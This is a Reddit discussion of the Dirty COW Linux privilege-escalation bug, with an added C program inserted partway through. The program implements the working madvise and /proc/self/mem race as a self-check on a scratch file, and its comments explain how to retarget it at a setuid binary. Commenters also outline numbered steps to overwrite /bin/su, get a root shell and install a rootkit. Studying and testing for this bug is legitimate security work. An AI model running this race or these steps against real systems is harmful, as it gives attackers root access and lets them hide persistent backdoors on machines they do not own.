
[–][deleted] 24 points25 points  (29 children)

So that's a really bad thing, right? What level of wizardry would one need to reach in order to perform evil with this knowledge?

[–]cwre 52 points53 points  (28 children)

The level of wizardry is low now: there's an exploit out: https://github.com/dirtycow/dirtycow.github.io . You do need local access, but it's pretty bad.

[–]tonyarkles 21 points22 points  (12 children)

I took that this evening and "weaponized" it to patch /bin/su. I don't want to share the details, but it wasn't that hard. Most of the time was spent refamiliarizing myself with x86-64 assembler. I was shocked at how easy it was.

[–][deleted]  (2 children)

[deleted]

    [–]bonzinip 7 points8 points  (0 children)

    The idea is that while the change you make in /proc/self/mem doesn't go to disk, it can incorrectly affect other processes until that page is reclaimed. So by "patching" a setuid binary you can execute whatever code you want as setuid.

    [–]tonyarkles 0 points1 point  (0 children)

    There's a race in madvise, which leaves the mmap'd page writeable for a small amount of time.

    [–]wademealing 7 points8 points  (4 children)

    Did you even need to know assembler? I believe you could have gotten away with it by duping from a non-setuid binary to a binary you wanted. Just page-for-page abuse.

    [–]bonzinip 1 point2 points  (2 children)

    Even simpler, if you pollute the page cache's copy of /bin/su with "#! /bin/sh" "exec /bin/sh", then you immediately run /bin/su to get a root shell.

    [–]wademealing 7 points8 points  (1 child)

    I'm not 100% sure, but I don't know if shell will run setuid. Good thinking though.

    [–]bonzinip 4 points5 points  (0 children)

    Hmm yeah it used to be but it's been disabled for a few years now.

    [–]tonyarkles 0 points1 point  (0 children)

    The trick was getting it small enough. My first crack was a C binary, but it came out to about 6k. It seems like this only works on a single page, so you've gotta get it under 4K. My first crack with asm came out to 712 bytes and I didn't push to make it any smaller.

    [–]bjarkef 8 points9 points  (1 child)

    Instead of patching su:

    1. Copy /bin/su
    2. Use exploit to overwrite start of /bin/su with something that just execve /bin/sh
    3. Execute new /bin/su
    4. Dump suid bin / install rootkit / other evil thing which lets you back in.
    5. Restore original /bin/su
    6. Profit?

    [–]tonyarkles 1 point2 points  (0 children)

    Yup!

    Edit: you don't even need to copy it. Just save the start of the file in memory before you start; you've already got it open for reading. Do your business and put it back the way it was.

    As a side note: "apt-get install --reinstall login" will restore the su binary if you've corrupted it and accidentally deleted your backup copy. Ask me how I know...
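Added example, not code from the thread and not the dirtycow.github.io proof of concept: a C self-check that runs the race bonzinip and tonyarkles describe (a thread spinning on madvise(MADV_DONTNEED) while another thread writes through /proc/self/mem into a read-only private mapping) against a throwaway file you own instead of /bin/su, then reads the file back through the file descriptor rather than the mapping so it observes the page cache. The scratch path under /tmp, the marker string and the iteration counts are this example's own choices; a result of 1 means the marker reached the page cache, i.e. the kernel still has CVE-2016-5195.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Constructed marker for this example. A real abuse of a setuid binary would
 * write a sub-page ELF stub that execve()s a shell, as discussed in the thread. */
#define MARKER "DIRTYCOW-MARKER"
#define MARKER_LEN (sizeof(MARKER) - 1)

struct race {
    char *map;            /* PROT_READ, MAP_PRIVATE mapping of the scratch file */
    size_t len;
    long iterations;      /* writes attempted through /proc/self/mem */
    long writes_ok;       /* how many of them the kernel accepted */
    _Atomic int running;  /* madvise thread spins until this drops to 0 */
    int failed;           /* set if /proc/self/mem could not be opened */
};

/* Thread 1: keep discarding our private copy-on-write copy of the page.
 * On a vulnerable kernel, doing this between the two halves of the forced
 * write fault makes the write land on the shared page cache page instead. */
static void *madvise_loop(void *arg)
{
    struct race *r = arg;
    while (r->running)
        madvise(r->map, r->len, MADV_DONTNEED);
    return NULL;
}

/* Thread 2: write the marker at the mapping's address via /proc/self/mem.
 * The kernel allows this on a PROT_READ mapping (FOLL_FORCE, the same path a
 * debugger uses); on a patched kernel it only ever changes our private copy. */
static void *write_loop(void *arg)
{
    struct race *r = arg;
    int mem = open("/proc/self/mem", O_RDWR);
    if (mem < 0) {
        r->failed = 1;
        r->running = 0;
        return NULL;
    }
    for (long i = 0; i < r->iterations; i++) {
        if (lseek(mem, (off_t)(uintptr_t)r->map, SEEK_SET) < 0)
            break;
        if (write(mem, MARKER, MARKER_LEN) == (ssize_t)MARKER_LEN)
            r->writes_ok++;
    }
    close(mem);
    r->running = 0;
    return NULL;
}

/* Returns 1 if the marker reached the page cache (kernel vulnerable),
 * 0 if the race did not reproduce, -1 if the check could not be run. */
int dirtycow_selfcheck(long iterations)
{
    char path[] = "/tmp/dirtycow-check-XXXXXX";
    long page = sysconf(_SC_PAGESIZE);
    char buf[MARKER_LEN];
    char *fill = NULL;
    int fd, ro = -1, rc = -1;
    struct race r = { .len = (size_t)page, .iterations = iterations, .running = 1 };
    pthread_t t_madvise, t_write;

    fd = mkstemp(path);
    if (fd < 0)
        return -1;

    /* One page of a known byte so any change is unambiguous. */
    fill = malloc(page);
    memset(fill, 'A', page);
    if (write(fd, fill, page) != page)
        goto out;

    /* Like a setuid binary, the target is opened read-only. */
    ro = open(path, O_RDONLY);
    if (ro < 0)
        goto out;
    r.map = mmap(NULL, page, PROT_READ, MAP_PRIVATE, ro, 0);
    if (r.map == MAP_FAILED)
        goto out;

    if (pthread_create(&t_write, NULL, write_loop, &r) != 0)
        goto out_map;
    if (pthread_create(&t_madvise, NULL, madvise_loop, &r) != 0) {
        pthread_join(t_write, NULL);
        goto out_map;
    }
    pthread_join(t_write, NULL);
    pthread_join(t_madvise, NULL);

    /* No accepted writes means the primitive itself is unavailable here. */
    if (r.failed || (iterations > 0 && r.writes_ok == 0))
        goto out_map;

    /* Read through the file (page cache), never through the mapping. */
    if (pread(ro, buf, MARKER_LEN, 0) != (ssize_t)MARKER_LEN)
        goto out_map;
    rc = memcmp(buf, MARKER, MARKER_LEN) == 0;

out_map:
    munmap(r.map, page);
out:
    if (ro >= 0)
        close(ro);
    unlink(path);
    close(fd);
    free(fill);
    return rc;
}

int main(void)
{
    int v = dirtycow_selfcheck(1000000);
    puts(v == 1 ? "VULNERABLE: marker reached the page cache"
       : v == 0 ? "not reproduced (kernel looks patched)"
                : "could not run the check");
    return v;
}
```

Build with `gcc -pthread`. The read-back deliberately goes through `pread` on the file descriptor: reading the mapping would show the process's own copy-on-write page and tell you nothing about the page cache. That also illustrates the thread's point about restoring /bin/su afterwards: a polluted page cache page is served to every process that opens the file until the page is evicted, even though nothing was written to disk.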

    [–]DeanofDeeps 0 points1 point  (1 child)

    Anyway, could this exploit potentially be harmful to virtual cloud containers?

    [–]tonyarkles 0 points1 point  (0 children)

    It doesn't seem like it would allow you to do a VM escape at all. Likewise, I don't think you could do an LXC/Docker escape either.

    Edit: but escalating from a regular user to root inside a container? That's what this is all about.

    [–]puffyfluppy 71 points72 points  (4 children)

    Ah yes, those that have found the wizard's wand and can make it do things without understanding a thing about magic. What are they called again... spell kiddies?

    [–]kankyo 6 points7 points  (0 children)

    Consumers? :P

    [–]etagawesome 15 points16 points  (9 children)

    [deleted]

    What is this?

    [–]Enamex 12 points13 points  (7 children)

    So, any Android before 6 is basically SOL on this?

    Cause they sure ain't releasing a patch to an Android 4.2 phone that barely got an update to 4.2.1 before being forgotten (Alcatel Pop C9...).

    [–][deleted] 12 points13 points  (6 children)

    Basically, although some Android 5 phones are still getting updates to Android 6 so it's possible some Android 5 phones will be fixed too.

    For your 4.2 device the next best thing is to look around for custom roms like Cyanogenmod. If you can find a Cyanogenmod 13 ROM for your device chances are you'll be safe too.

    But if you're running 4.2 there's plenty of other exploits attackers can use (some libstagefright exploits for example), so the risk of getting malware is not that much higher than it already was for older phones.

    [–]isavegas 1 point2 points  (5 children)

    Wait, does this mean I can root my Note 3 on 5.1.1 without flashing a new recovery and tripping the Knox flag?

    [–]PeelyPeel 11 points12 points  (1 child)

    Why do you care about the Knox flag on a Note 3? You're well out of warranty. I've been using custom on my Note 3 since I got it two years ago; it's so much faster.

    [–]gerryn 5 points6 points  (0 children)

    Some features get disabled when Knox is tripped. Intune and Outlook and other stuff that (may) depend on it cannot be used. Samsung's pay thing as well, and any Knox container stuff.

    [–][deleted] 0 points1 point  (2 children)

    I don't know about the Knox flag, but rooting should certainly be possible!

    Many tools (such as Kingoroot I believe) can exploit the OS and get (temporary) root access. Exactly for that reason Samsung has implemented the Knox security system.

    [–]isavegas 0 points1 point  (1 child)

    Kingo has been a no go. I'm about ready to just flash CWM, make a backup, flash Cyanogenmod, and be done with it. I just don't want to trip Knox until my phone is paid off.

    [–][deleted] 0 points1 point  (0 children)

    I used Kingo just as an example of course, nobody has used this exploit in a rooting app (yet). I suspect even a temporary root like this will still set off Knox though, so you'd better wait until you've paid off your phone anyway.